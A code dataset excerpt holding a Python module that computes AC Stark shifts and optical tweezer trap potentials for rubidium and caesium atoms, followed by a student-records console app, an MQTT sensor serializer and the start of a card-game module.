plt.ylim(Ylim2)\r\n plt.xlim(xlims)\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylabel(\"Stark Shift (MHz)\")\r\n plt.legend()\r\n \r\n plt.show()\r\n \r\n \r\n \r\ndef getStarkShift(obj):\r\n \"\"\"Print the ac Stark Shift for all of the hyperfine levels in a particular\r\n fine structure state of the atom in dipoleObject\"\"\"\r\n Lterms = ['S', 'P', 'D', 'F', 'G'] # labels for angular momentum states\r\n\r\n # show some important parameters\r\n outstring = obj.X + \" \" + Lterms[obj.L] + str(int(obj.J*2)\r\n ) + \"/2 ac Stark Shift at %.0f nm for E field %.2g V/m:\\n\"%(\r\n obj.field.lam*1e9, obj.field.E0)\r\n \r\n outstring += \"\\nIf hyperfine splitting is insignificant:\\n\"\r\n for MJ in np.arange(1, 2*obj.J+1, 2).astype(int): # NB: this is 2*MJ\r\n outstring += \"MJ = \"+str(MJ)+\"/2 : %.5g MHz\\n\"%(\r\n obj.acStarkShift(0,0,0, obj.field.lam, mj=MJ/2., HF=False)/h/1e6)\r\n a = np.zeros(4) # make sure the results are always a size 3 array\r\n alpha = obj.polarisability(wavel=obj.field.lam, mj=MJ/2., HF=False, split=True)\r\n atot = obj.polarisability(wavel=obj.field.lam, mj=MJ/2., HF=False, split=False)\r\n a[:np.size(alpha)] = alpha\r\n outstring += \"polarisability components (scalar, vector, tensor) : \\n(%.4g, %.4g, %.4g) a.u.\\n\"%(\r\n a[0]/au, a[1]/au, a[2]/au)\r\n outstring += \"combined polarisability : %.4g a.u\\n\"%(atot/au)\r\n \r\n \r\n outstring += \"\\nIf hyperfine splitting is significant:\\n\"\r\n for F in range(int(abs(obj.I - obj.J)), int(obj.I + obj.J+1)):\r\n mfAveShift = 0\r\n for MF in range(-F, F+1):\r\n obj.F, obj.MF = F, MF\r\n mfAveShift += obj.acStarkShift(0,0,0, obj.field.lam, HF=True)/h/1e6\r\n outstring += \"F = \"+str(F)+ \", ave. mF : %.5g MHz.\\n\"%(mfAveShift/(2.*F+1.))\r\n obj.F, obj.MF = F, F\r\n outstring += \"|\"+str(F)+\",\"+str(F)+\"> : %.5g MHz\\n\"%(\r\n obj.acStarkShift(0,0,0, obj.field.lam, HF=True)/h/1e6)\r\n\r\n a = np.zeros(4) # make sure the results are always a size 3 array\r\n alpha = obj.polarisability(wavel=obj.field.lam, HF=True, split=True)\r\n atot = obj.polarisability(wavel=obj.field.lam, HF=True, split=False)\r\n a[:np.size(alpha)] = alpha\r\n outstring += \"polarisability components (scalar, vector, tensor) : \\n(%.4g, %.4g, %.4g) a.u.\\n\"%(\r\n a[0]/au, a[1]/au, a[2]/au)\r\n outstring += \"combined polarisability : %.4g a.u\\n\\n\"%(atot/au)\r\n \r\n return outstring\r\n \r\ndef runGUI():\r\n \"\"\"A UI to get the stark shift from a user supplied state\"\"\"\r\n import tkinter\r\n from tkinter import messagebox\r\n \r\n root = tkinter.Tk() # main window\r\n frames, labels, entries = [], [], [] # the user must enter variables\r\n labeltext = ['Wavelength (m): ', 'Beam waist (m): ', 'Beam power (W): ', \r\n 'Atom (Rb87/Cs133): ', 'Orbital angular momentum L: ', \r\n 'Total angular momentum J: ']\r\n entrystrings = [tkinter.StringVar() for i in range(len(labeltext))]\r\n default = ['932e-9', '1e-6', '3.9e-3', 'Cs133', '0', '0.5']\r\n \r\n \r\n for i in range(len(labeltext)):\r\n frames.append(tkinter.Frame(root)) # frame for placing entries\r\n frames[-1].pack(side=tkinter.TOP) # position in descending order\r\n labels.append(tkinter.Label(frames[-1], text=labeltext[i]))\r\n labels[-1].pack(side=tkinter.LEFT) # position label on left\r\n entries.append(tkinter.Entry(frames[-1], textvariable=entrystrings[i]))\r\n entrystrings[i].set(default[i]) # set default string text\r\n entries[-1].pack(side=tkinter.RIGHT)# text entry on right\r\n \r\n \r\n def showResult():\r\n wavelength = float(entrystrings[0].get()) # laser wavelength in nm\r\n beamwaist = float(entrystrings[1].get()) # beam waist in m\r\n power = float(entrystrings[2].get()) # power in Watts \r\n bprop = [wavelength, power, beamwaist] # collect beam properties\r\n atomSymbol = entrystrings[3].get() # choose Rb or Cs\r\n L = int(entrystrings[4].get()) # orbital angular momentum\r\n J = float(entrystrings[5].get()) # total angular momentum\r\n \r\n # choose element\r\n if atomSymbol == \"Rb87\":\r\n atomObj = atom(atm = 'Rb87')\r\n F = 1\r\n elif atomSymbol == \"Cs133\":\r\n atomObj = atom(atm = 'Cs133')\r\n F = 3\r\n elif atomSymbol == \"K41\":\r\n atomObj = atom(atm = 'K41')\r\n F = 1\r\n else:\r\n messagebox.showinfo(\"Error\", \"You must choose Rb87, Cs133 or K41\")\r\n return 0\r\n \r\n # get transition data for the given state\r\n if L == 0:\r\n D0, w0, lw, nlj = atomObj.D0S, atomObj.w0S, atomObj.lwS, atomObj.nljS\r\n elif L == 1 and J == 0.5:\r\n D0, w0, lw, nlj = atomObj.D0P1, atomObj.w0P1, atomObj.lwP1, atomObj.nljP1\r\n elif L == 1 and J == 1.5:\r\n D0, w0, lw, nlj = atomObj.D0P3, atomObj.w0P3, atomObj.lwP3, atomObj.nljP3\r\n \r\n # construct the instance of the dipole class\r\n dipoleObj = dipole(atomObj, (L,J,F,F), bprop)\r\n \r\n messagebox.showinfo(\"Calculation Result\", getStarkShift(dipoleObj))\r\n \r\n resultButton = tkinter.Button(root, text=\"Calculate Stark Shifts\", \r\n command=showResult)\r\n resultButton.pack(side = tkinter.BOTTOM)\r\n \r\n root.mainloop()\r\n \r\n \r\ndef combinedTrap(Cswl = 1064e-9, # wavelength of the Cs tweezer trap in m\r\n Rbwl = 880e-9, # wavelength of the Rb tweezer trap in m\r\n power = 6e-3, # power of Cs tweezer beam in W\r\n Rbpower = -1, # power of Rb tweezer beam in W \r\n beamwaist = 1e-6): # beam waist in m\r\n \"\"\"Model tweezer traps for Rb and Cs and find the potential each experiences\r\n when they're overlapping. Should fix the separate tweezer trap depths to >1mK.\r\n We also want Rb to experience a deeper trap from its tweezer than from the Cs\r\n tweezer so that there isn't too much heating during merging.\r\n args:\r\n Cswl = 1064e-9, # wavelength of the Cs tweezer trap in m\r\n Rbwl = 880e-9, # wavelength of the Rb tweezer trap in m\r\n power = 6e-3, # power of Cs tweezer beam in W\r\n Rbpower = -1, # power of Rb tweezer beam in W (if < 0 then choose a power\r\n such that both species experience the same trap depth when the tweezers are\r\n overlapping)\r\n beamwaist = 1e-6 # beam waist in m\r\n \"\"\"\r\n bprop = [Cswl, power, beamwaist] # collect beam properties\r\n \r\n # For the 1064nm trap:\r\n # mass, (L,J,F,MF), bprop, dipole matrix elements (Cm), resonant frequencies (rad/s),\r\n # linewidths (rad/s), state labels, nuclear spin, atomic symbol.\r\n # groundstate rubidium\r\n Rb = atom(atm = 'Rb87')\r\n Rb1064 = dipole(Rb, (0,1/2.,1,1), bprop)\r\n \r\n # groundstate caesium\r\n Cs = atom(atm = 'Cs133')\r\n Cs1064 = dipole(Cs, (0,1/2.,4,4), bprop)\r\n \r\n CsP = dipole(Cs, (1,3/2.,5,5), bprop)\r\n \r\n # set the power of the traps so that the trap depth experienced by each \r\n # species in the overlapping trap is the same:\r\n if Rbpower < 0:\r\n Rbpower = (Cs1064.polarisability(Cswl,mj=0.5) - Rb1064.polarisability(Cswl, mj=0.5)) / (Rb1064.polarisability(Rbwl, mj=0.5) - Cs1064.polarisability(Rbwl, mj=0.5)) * power\r\n \r\n # for the 880nm trap:\r\n bprop = [Rbwl, abs(Rbpower), beamwaist]\r\n Rb880 = dipole(Rb, (0,1/2.,1,1), bprop)\r\n \r\n Cs880 = dipole(Cs, (0,1/2.,3,3), bprop)\r\n \r\n \r\n # in the trap with both tweezers overlapping: \r\n U0 = abs(Rb1064.acStarkShift(0,0,0) + Rb880.acStarkShift(0,0,0))\r\n wrRb = np.sqrt(4*U0 / Rb.m / beamwaist**2) /2. /np.pi /1e3\r\n wrCs = np.sqrt(4*U0 / Cs.m / beamwaist**2) /2. /np.pi /1e3\r\n print(\"%.0f beam power: %.3g mW\\t\\t%.0f beam power: %.3g mW\"%(Cswl*1e9, power*1e3, Rbwl*1e9, Rbpower*1e3))\r\n print(\"\"\"In the combined %.0fnm and %.0fnm trap with a depth of %.3g mK the radial trapping frequencies are: \r\nRubidium: %.0f kHz \\nCaesium: %.0f kHz\"\"\"%(Rbwl*1e9, Cswl*1e9, U0/kB*1e3, wrRb, wrCs))\r\n \r\n # with just the Cs tweezer trap:\r\n URb =abs(Rb1064.acStarkShift(0,0,0))\r\n wrRb1064 = np.sqrt(4*URb / Rb.m / beamwaist**2) /2. /np.pi /1e3\r\n UCs = abs(Cs1064.acStarkShift(0,0,0))\r\n wrCs1064 = np.sqrt(4*UCs / Cs.m / beamwaist**2) /2. /np.pi /1e3\r\n print(\"\"\"\\nIn just the %.0fnm trap:\r\n Rubidium has trap depth %.3g mK\r\n radial trapping frequency %.0f kHz\r\n Caesium has trap depth %.3g mK\r\n radial trapping frequency %.0f kHz\"\"\"%(Cswl*1e9, URb/kB*1e3, wrRb1064, UCs/kB*1e3, wrCs1064))\r\n \r\n print(getStarkShift(Cs1064))\r\n print(getStarkShift(CsP))\r\n \r\n # plot merging traps:\r\n n = 5 # number of time steps in merging to plot\r\n sep = np.linspace(0, 10e-6, n) # initial separation of the tweezer traps\r\n zs = np.linspace(-2, 10, 200)*1e-6 # positions along the beam axis\r\n \r\n for atoms in [[Rb1064, Rb880], [Cs1064, Cs880]]:\r\n plt.figure()\r\n plt.subplots_adjust(hspace=0.01)\r\n \r\n for i in range(n):\r\n ax = plt.subplot2grid((n,1), (i,0))\r\n \r\n U = (atoms[0].acStarkShift(0,0,zs) + atoms[1].acStarkShift(0,0,zs-sep[n-i-1]))/kB*1e3 # combined potential along the beam axis\r\n U1064 = atoms[0].acStarkShift(0,0,zs)/kB*1e3 # potential in the 1064 trap\r\n U880 = atoms[1].acStarkShift(0,0,zs-sep[n-i-1])/kB*1e3 # potential in the 880 trap\r\n plt.plot(zs*1e6, U, 'k')\r\n plt.plot(zs*1e6, U1064, color='tab:orange', alpha=0.6)\r\n plt.plot(zs*1e6, U880, color='tab:blue', alpha=0.6)\r\n plt.plot([0]*2, [min(U),0], color='tab:orange', linewidth=10, label='%.0f'%(Cswl*1e9), alpha=0.4)\r\n plt.plot([sep[n-i-1]*1e6]*2, [min(U),0], color='tab:blue', linewidth=10, label='%.0f'%(Rbwl*1e9), alpha=0.4)\r\n ax.set_xticks([])\r\n ax.set_yticks([])\r\n\r\n if i == 0:\r\n ax.set_title(\"Optical potential experienced by \"+atoms[0].X\r\n +\"\\n%.0f beam power: %.3g mW %.0f beam power: %.3g mW\"%(Cswl*1e9, power*1e3, Rbwl*1e9, Rbpower*1e3),\r\n pad = 25)\r\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=2, mode=\"expand\", borderaxespad=0.)\r\n \r\n \r\n plt.xlabel(r'Position ($\\mu$m)')\r\n ax.set_xticks(sep*1e6)\r\n plt.ylabel('Trap Depth (mK)')\r\n ax.yaxis.set_major_locator(AutoLocator())\r\n \r\n plt.show()\r\n \r\n \r\ndef getMFStarkShifts(ATOM, wavelength = 1064e-9, # laser wavelength in m\r\n power = 0.00906143, # laser power in W\r\n beamwaist = 1e-6 # beam waist in m\r\n ):\r\n \"\"\"Return the Stark shifts of the MF states for cooling/repump transitions\"\"\"\r\n bprop = [wavelength, power, beamwaist] # collect beam properties\r\n if ATOM.atm == 'Cs133': # assign the relevant hyperfine transitions\r\n Fs = [3,4]\r\n l1 = [18,24] # index of lines for making legend\r\n elif ATOM.atm == 'Rb87':\r\n Fs = [1,2]\r\n l1 = [6,12] # index of lines for making legend\r\n \r\n # print(\"Stark shift of \"+ATOM.X+\" S1/2 F = %s, %s -> P3/2 F' = %s, %s for different MF states.\"%(Fs[0],Fs[0]+1,Fs[1],Fs[1]+1))\r\n \r\n plt.figure()\r\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\r\n for F in Fs:\r\n for MF in range(-F, F+1):\r\n print(\" ----- |F = \"+str(F)+\", m_F = \"+str(MF)+\">\")\r\n for MFp in range(MF-1, MF+2):\r\n S = dipole(ATOM, (0,1/2.,F,MF), bprop)\r\n P = dipole(ATOM, (1,3/2.,F+1,MFp), bprop)\r\n shift = (S.acStarkShift(0,0,0, bprop[0], HF=True) - P.acStarkShift(0,0,0, bprop[0], HF=True))/h/1e6\r\n if MF != 0:\r\n deltaMF = (MFp-MF)*np.sign(MF)\r\n else:\r\n deltaMF = (MFp-MF)\r\n plt.plot(MF, shift, '_', color=colors[F-1], alpha=0.33*(2+deltaMF), markersize=15, linewidth=10)\r\n print(\"|F' = \"+str(F+1)+\", m_F' = \"+str(MFp)+\"> : %.5g MHz\"%shift)\r\n \r\n plt.xlabel(\"$M_F$\") \r\n plt.ylabel(\"AC Stark Shift (MHz)\")\r\n lines = plt.gca().lines\r\n plt.legend(lines[l1[0]:l1[1]], ['F='+str(f)+r', $\\Delta M_F=$'+str(-dmf) \r\n for f in range(min(Fs),max(Fs)+1) for dmf in range(-1,2)])\r\n plt.show()\r\n\r\n''' rvb 15.05.2019: I've just added this function so I can work out lightshifts for the LGM -\r\n haven't changed anything else! \r\n Interested in the Cs (Rb) shifts of the F' = 4 (2) mF states relative to each other.\r\n \r\n '''\r\ndef vmfSS(ATOM):\r\n \"\"\"Return the Stark shifts of the MF states for Cs cooling/repump transitions\"\"\"\r\n \r\n plt.figure()\r\n \r\n if ATOM.atm == 'Cs133':\r\n Cs = ATOM\r\n F = 5\r\n bprop = [938e-9, 8e-3, 1.7e-6] # wavelength, beam power, beam waist\r\n for MFp in range(-F, F+1, 1):\r\n P = dipole(Cs, (1,3/2.,F,MFp), bprop)\r\n Pshift = P.acStarkShift(0,0,0, bprop[0], HF=True)/h/1e6 # interested in how the EStates shift relative to each other\r\n plt.plot(MFp, Pshift, '_', markersize=15, linewidth=10, color = '#7E317B')\r\n print(\"|F' = \"+str(F)+\", m_F' = \"+str(MFp)+\"> : %.5g MHz\"%Pshift)\r\n \r\n elif ATOM.atm == 'Rb87':\r\n Rb = ATOM\r\n F = 3\r\n bprop = [940e-9, 35e-3, 1.7e-6] # wavelength, beam power, beam waist\r\n for MFp in range(-F, F+1, 1):\r\n P = dipole(Rb, (1,3/2.,F,MFp), bprop)\r\n Pshift = P.acStarkShift(0,0,0, bprop[0], HF=True)/h/1e6 # interested in how the EStates shift relative to each other\r\n s, v, t = P.polarisability(bprop[0], mj=3/2, HF=False, split=True)\r\n # print('split ',s/au, t/au)\r\n s, v, t = P.polarisability(bprop[0], mj=3/2, HF=True, split=True)\r\n # print('avrge ',s/au, t/au)\r\n plt.plot(MFp, Pshift, '_', markersize=15, linewidth=10, color = '#7E317B')\r\n print(\"|F' = \"+str(F)+\", m_F' = \"+str(MFp)+\"> : %.5g MHz\"%Pshift)\r\n \r\n plt.title('Stark Shifts of ' + ATOM.atm + \" |F' = \" + str(F) + ', $M_F$> states' ) \r\n plt.xlabel(\"$M_F$\") \r\n plt.ylabel(\"AC Stark Shift (MHz)\")\r\n plt.show()\r\n\r\n\r\ndef compareKien():\r\n \"\"\"compare Kien 2013 Fig 4,5\"\"\"\r\n bprop =[880e-9,20e-3,1e-6]\r\n Cs = atom(atm = 'Cs133')\r\n Cs880 = dipole(Cs, (0,1/2.,3,3), bprop)\r\n \r\n CsP = dipole(Cs, (1,3/2.,3,3), bprop) \r\n \r\n wls = [np.linspace(680, 690, 200)*1e-9, np.linspace(930, 940, 200)*1e-9]\r\n ylims = [(-1200, 300), (-3000, 6000)]\r\n for ii in range(2):\r\n plt.figure()\r\n plt.title(\"Cs Polarisabilities. Red: 6S$_{1/2}$, Blue: 6P$_{3/2}$.\\nscalar: solid, vector: dashed, tensor: dotted\")\r\n a1 = Cs880.polarisability(wls[ii],mj=0.5,split=True)\r\n a2 = 0.5*(np.array(CsP.polarisability(wls[ii],mj=1.5, split=True))+\r\n np.array(CsP.polarisability(wls[ii],mj=0.5, split=True)))\r\n ls = ['-', '--', ':']\r\n for i in range(3):\r\n plt.plot(wls[ii]*1e9, a1[i]/au, 'r', linestyle=ls[i], label=\"Cs\")\r\n plt.plot(wls[ii]*1e9, a2[i]/au, 'b', linestyle=ls[i], label=\"$P_{3/2}$\")\r\n #plt.legend()\r\n plt.ylim(ylims[ii])\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylabel(\"Polarisablity (a.u.)\")\r\n plt.show()\r\n \r\n\r\ndef check880Trap(wavelength = 880e-9, # wavelength in m\r\n wavels = np.linspace(795,930,500)*1e-9, # wavelengths in m to plot\r\n power = 5e-3, # beam power in W\r\n beamwaist = 1e-6, # beam waist in m\r\n species = 'Rb'): # which species to set a 1mK trap for\r\n \"\"\"Plot graphs of the trap depth experienced by Cs around 880nm when \r\n the ground state Rb trap depth is fixed at 1mK. Look at the scattering\r\n rates and hence trap lifetimes that are possible.\"\"\"\r\n bprop = [wavelength, power, beamwaist]\r\n Rb = atom(atm = 'Rb87')\r\n Rb5S = dipole(Rb, (0,1/2.,1,1), bprop)\r\n \r\n Rb5P = dipole(Rb, (1,3/2.,1,1), bprop)\r\n \r\n Cs = atom(atm = 'Cs133') \r\n Cs6S = dipole(Cs, (0,1/2.,3,3), bprop)\r\n \r\n Cs6P = dipole(Cs, (1,3/2.,3,3), bprop) \r\n \r\n # choose power so that Rb trap depth is fixed at 1 mK:\r\n if species == Cs.X:\r\n Powers = abs(1e-3*kB * np.pi * eps0 * c * beamwaist**2 / Cs6S.polarisability(wavels)) # in Watts\r\n else:\r\n Powers = abs(1e-3*kB * np.pi * eps0 * c * beamwaist**2 / Rb5S.polarisability(wavels)) # in Watts\r\n _, ax1 = plt.subplots()\r\n ax1.set_title('Fixing the trap depth of ground state '+species+' at 1 mK')\r\n ax1.set_xlabel('Wavelength (nm)')\r\n ax1.plot(wavels*1e9, Powers*1e3, color='tab:blue')\r\n ax1.set_ylabel('Power (mW)', color='tab:blue')\r\n ax1.tick_params(axis='y', labelcolor='tab:blue')\r\n ax1.set_xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n # ax1.set_ylim(min(Powers)*1e3-0.5, 15)\r\n\r\n ax2 = ax1.twinx()\r\n # now the power and the wavelength are varied:\r\n Llabels = ['$S_{1/2}$', '$P_{3/2}$']\r\n if species == Cs.X:\r\n colors = ['k', 'tab:orange', 'tab:orange', 'tab:orange']\r\n linestyles = ['--', '-.', '-', ':']\r\n else:\r\n colors = ['tab:orange', 'tab:orange', 'k', 'tab:orange']\r\n linestyles = ['-', '-.', '--', ':']\r\n \r\n trapdepths = []\r\n for obj in [Cs6S, Cs6P, Rb5S, Rb5P]:\r\n res = np.zeros(len(Powers))\r\n for i in range(len(Powers)):\r\n obj.field.E0 = 2 * np.sqrt(Powers[i] / eps0 / c / np.pi)/beamwaist\r\n # average mj states (doesn't have any effect on j=1/2 states)\r\n res[i] = 0.5*(obj.acStarkShift(0,0,0, wavels[i], mj=1.5) + \r\n obj.acStarkShift(0,0,0, wavels[i], mj=0.5))\r\n color = colors.pop(0)\r\n ls = linestyles.pop(0)\r\n ax2.plot(wavels*1e9, res*1e3/kB, color=color, label=obj.X+\" \"+Llabels[obj.L], linestyle=ls)\r\n trapdepths.append(res)\r\n\r\n ax2.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.1) # show zero crossing \r\n ax2.set_ylabel('Trap Depth (mK)', color='tab:orange')\r\n ax2.legend()\r\n ax2.set_ylim(-3, 3)\r\n ax2.tick_params(axis='y', labelcolor='tab:orange')\r\n plt.tight_layout()\r\n\r\n I = 2*Powers / np.pi / beamwaist**2\r\n # scattering rate of Cs from the D2 line:\r\n deltaCsD1 = 2*np.pi*c * (1/wavels - 1/Cs.rwS[0]) # detuning from D1 (rad/s)\r\n deltaCsD2 = 2*np.pi*c * (1/wavels - 1/Cs.rwS[35]) # detuning from D2 (rad/s)\r\n IsatCsD1 = 2.4981 *1e-3 *1e4 # saturation intensity for D1 transition, sigma polarised\r\n IsatCsD2 = 1.1023 *1e-3 *1e4 # saturation intensity for D2 transition, pi polarised\r\n CsRsc = 0\r\n for vals in [[Cs.lwS[0], deltaCsD1, IsatCsD1], [Cs.lwS[35], deltaCsD2, IsatCsD2]]:\r\n CsRsc += vals[0]/2. * I/vals[2] / (1 + 4*(vals[1]/vals[0])**2 + I/vals[2])\r\n # Cstau = 1e-3*kB / (hbar*(2*np.pi/wavels))**2 * 2.*Cs.m / CsRsc # the lifetime is the trap depth / recoil energy / scattering rate\r\n Cst = 4*np.sqrt(Cs.m*abs(trapdepths[0])) / (2*np.pi/wavels)**2 /hbar /beamwaist /CsRsc # duration in vibrational ground state (s) = 1/Lamb-Dicke^2 /Rsc\r\n\r\n # scattering rate of Rb from the D1 line:\r\n deltaRbD1 = 2*np.pi*c * (1/wavels - 1/Rb.rwS[0]) # detuning from D1 (rad/s)\r\n IsatRbD1 = 4.484 *1e-3 *1e4 # saturation intensity for D1 transition, pi polarised\r\n RbRsc = Rb.lwS[0]/2. * I/IsatRbD1 / (1 + 4*(deltaRbD1/Rb.lwS[0])**2 + I/IsatRbD1) # per second\r\n # Rbtau = 1e-3*kB / (hbar*(2*np.pi/wavels))**2 * 2.*Rb.m / RbRsc # the lifetime is the trap depth / recoil energy / scattering rate\r\n Rbt = 4*np.sqrt(Rb.m*abs(trapdepths[2])) / (2*np.pi/wavels)**2 /hbar /beamwaist /RbRsc # duration in vibrational ground state (s) = 1/Lamb-Dicke^2 /Rsc\r\n\r\n # plot lifetime and scattering rate on the same axis:\r\n for Rsc, ts, X in [[RbRsc, Rbt, Rb.X], [CsRsc, Cst, Cs.X]]:\r\n fig, ax3 = plt.subplots()\r\n ax3.set_title('Scattering rate and lifetime of ground state '+X+' in a 1 mK trap (for '+species+')')\r\n ax3.set_xlabel('Wavelength (nm)')\r\n ax3.semilogy(wavels*1e9, Rsc, color='tab:blue')\r\n ax3.plot(wavels*1e9, np.zeros(len(wavels))+100, '--', color='tab:blue', alpha=0.25) # show acceptable region\r\n ax3.set_ylabel('Scattering rate ($s^{-1}$)', color='tab:blue')\r\n ax3.tick_params(axis='y', labelcolor='tab:blue')\r\n ax3.set_xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n ax3.set_ylim(1, 1e5)\r\n\r\n ax4 = ax3.twinx()\r\n ax4.semilogy(wavels*1e9, ts, color='tab:orange')\r\n ax4.plot(wavels*1e9, np.ones(len(wavels))/2., '--', color='tab:orange', alpha=0.25) # show acceptable region\r\n ax4.set_ylabel('Time in the vibrational ground state (s)', color='tab:orange')\r\n ax4.tick_params(axis='y', labelcolor='tab:orange')\r\n ax4.set_ylim(0.001,10)\r\n plt.tight_layout()\r\n \r\n plt.show()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n # run GUI by passing an arg:\r\n if np.size(sys.argv) > 1 and sys.argv[1] == 'rungui':\r\n runGUI()\r\n sys.exit() # don't run any of the other code below\r\n atom = atom(atm = 'Rb87')\r\n vmfSS(atom)\r\n\r\n # combinedTrap(Cswl = 1064e-9, # wavelength of the Cs tweezer trap in m\r\n # Rbwl = 810e-9, # wavelength of the Rb tweezer trap in m\r\n # power = 5e-3, # power of Cs tweezer beam in W\r\n # Rbpower = 1e-3, # power of Rb tweezer beam in W \r\n # beamwaist = 1e-6)\r\n #check880Trap(wavels=np.linspace(795, 1100, 400)*1e-9, species='Rb')\r\n\r\n # getMFStarkShifts()\r\n # plotStarkShifts(wlrange=[800,1100])\r\n\r\n # for STATES in [[Rb5S, Rb5P],[Cs6S, Cs6P]]:\r\n # plt.figure()\r\n # plt.title(\"AC Stark Shift in \"+STATES[0].X+\"\\nbeam power %.3g mW, beam waist %.3g $\\mu$m\"%(power*1e3,beamwaist*1e6))\r\n # plt.plot(wavels*1e9, STATES[0].acStarkShift(0,0,0,wavels)/kB*1e3, 'tab:blue', label='Ground S$_{1/2}$')\r\n # excited_shift = 0.5*(STATES[1].acStarkShift(0,0,0,wavels,mj=0.5) + STATES[1].acStarkShift(0,0,0,wavels,mj=1.5))\r\n # plt.plot(wavels*1e9, excited_shift/kB*1e3, 'r-.', label='Excited P$_{3/2}$')\r\n # plt.legend()\r\n # plt.ylabel(\"Trap Depth (mK)\")\r\n # plt.xlabel(\"Wavelength (nm)\")\r\n # plt.xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n # plt.ylim(-5,5)\r\n # plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show zero crossing\r\n # plt.show()","sub_path":"AtomFieldInt_Example_functions.py","file_name":"AtomFieldInt_Example_functions.py","file_ext":"py","file_size_in_byte":29696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"3750858","text":"'''\n5th STD TO BOARD EXAMINATION Student management application program\n\nAuthors:\n Vidyadhar Sharma \n Sai Samyam v\n'''\n\nfrom studentManager import Student,pprint,json\nfrom tabulate import tabulate\n\nprint('-'*40,'\\n *************EL ALUMNO************* \\n','-'*39)\n\ndata= {}# The dictionary used \ntry:\n with open('StudentDB.json') as file:\n data.update(json.load(file)) \nexcept:\n pass \n \n# the while loop that keeps repeating the functions \nwhile True:\n # the options are displayed one below the other \n print(tabulate([(1,'ENTER STUDENT DETAILS',),(2,'DISPLAY ALL THE STUDENT DETAILS',),(3,'SEARCH STUDENT DETAILS',),(4,'DELETE STUDENT DETAILS',),(5,'UPDATE STUDENT DETAILS AFTER REVALUATION',),(6,'SAVE AND EXIT')]))\n print('\\n What option number would you like to choose?: ')\n #the user chooses the suitable opyions to perform his functions \n ch = int(input('\\n Your choice: '))\n\n if ch == 1:\n # the student detail inputs \n admittee = Student()\n data[admittee.rollno] = {'a.NAME: ':admittee.name,'b.ROLL NUMBER: ':admittee.rollno,'c.MATHEMATICS: ':admittee.math,'d.SCIENCE: ':admittee.science,'e.SOCIAL SCIENCE: ':admittee.socialscience,'f.ENGLISH: ':admittee.english,'g.LANGUAGE: ':admittee.language,'h.TOTAL: ':admittee.total,'i.PERCENTAGE: ':str(admittee.percentage) + '%'}\n \n elif ch == 2:\n #displays the data in form of a dictionary \n print('\\n Details of all the entered students:')\n pprint(data)\n \n elif ch == 3:\n # allows u to pick the student whose data needs to be displayed \n rn = int(input('Enter Roll number of student for his/her details: '))\n pprint(data[rn])\n \n elif ch == 4:\n # deletes the details of a particular student\n rn = int(input('Enter roll number of student to delete his/her details: '))\n del (data[rn])\n\n elif ch == 5: \n # updates the details of the student\n rn = int(input('Enter roll number of student whose revaluation is completed: '))\n del (data[rn])\n admittee = Student()\n data[admittee.rollno] = {'a.NAME: ':admittee.name,'b.ROLL NUMBER: ':admittee.rollno,'c.MATHEMATICS: ':admittee.math,'d.SCIENCE: ':admittee.science,'e.SOCIAL SCIENCE: ':admittee.socialscience,'f.ENGLISH: ':admittee.english,'g.LANGUAGE: ':admittee.language,'h.TOTAL: ':admittee.total,'i.PERCENTAGE: ':str(admittee.percentage) + '%'}\n \n\n\n elif ch == 6:\n #saves the data\n with open('StudentDB.json','w') as file:\n json.dump(data, file)\n print('THANK YOU')\n #breaks the loop \n break\n \n else: \n print('Try Again') \n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"215517718","text":"class sensor:\n from i2c import read_arduino\n from wire1 import read_value\n from do import read_do\n import logging\n import traceback\n import json\n\n def __formatter(self, value, topic):\n print({\"topic\": topic, \"status\": \"sending\", \"value\": str(value)})\n return self.json.dumps({\"status\": \"sending\", \"value\": str(value)})\n\n def __serialize(self, mqtt_send, sensor_function, topic, slave_addr, sensor_type):\n def get_then_send():\n mqtt_send(self.__formatter(\n sensor_function(slave_addr, sensor_type), topic))\n return(get_then_send)\n\n def __init__(self, url, sensor_parameters):\n from mqtt import mqtt\n\n self.logging.basicConfig(filename=\"error.log\")\n\n sensor_type = sensor_parameters[3]\n slave_addr = sensor_parameters[2]\n sensor_function = sensor_parameters[1]\n topic = sensor_parameters[0]\n switch = {\n \"read_arduino\": read_arduino,\n \"read_value\": read_value,\n \"read_do\": read_do\n }\n self.get_send = self.__serialize(\n mqtt(topic, url).send,\n switch.get(sensor_function),\n topic,\n slave_addr,\n sensor_type\n )\n\n def process(self):\n try:\n self.get_send()\n except Exception as e:\n self.logging.error(self.traceback.format_exc())\n print(e)\n","sub_path":"sensor_serializer.py","file_name":"sensor_serializer.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291364437","text":"from CardTypes import *\nfrom Triggers_Auras import *\nfrom numpy.random import choice as npchoice\nfrom numpy.random import randint as nprandint\nfrom numpy.random import shuffle as npshuffle\nfrom numpy import inf as npinf\n\nfrom Basic import IllidariInitiate\n\n\"\"\"\"Demon Hunter Yr Dragon cards\"\"\"\n\n\"\"\"Mana 0 cards\"\"\"\nclass Blur(Spell):\n\tClass, name = \"Demon Hunter\", \"Blur\"\n\trequireTarget, mana = False, 0\n\tindex = \"DHInitiate~Demon Hunter~Spell~0~Blur\"\n\tdescription = \"Your hero can't take damage this turn\"\n\t#不知道与博尔碎盾的结算是如何进行的。\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tBlur_Effect(self.Game, self.ID).connect()\n\t\treturn None\n\t\t\nclass Blur_Effect:\n\tdef __init__(self, Game, ID):\n\t\tself.Game, self.ID = Game, ID\n\t\tself.signals = [\"FinalDmgonHero?\"]\n\t\tself.temp = False\n\t\t\n\tdef connect(self):\n\t\ttry: 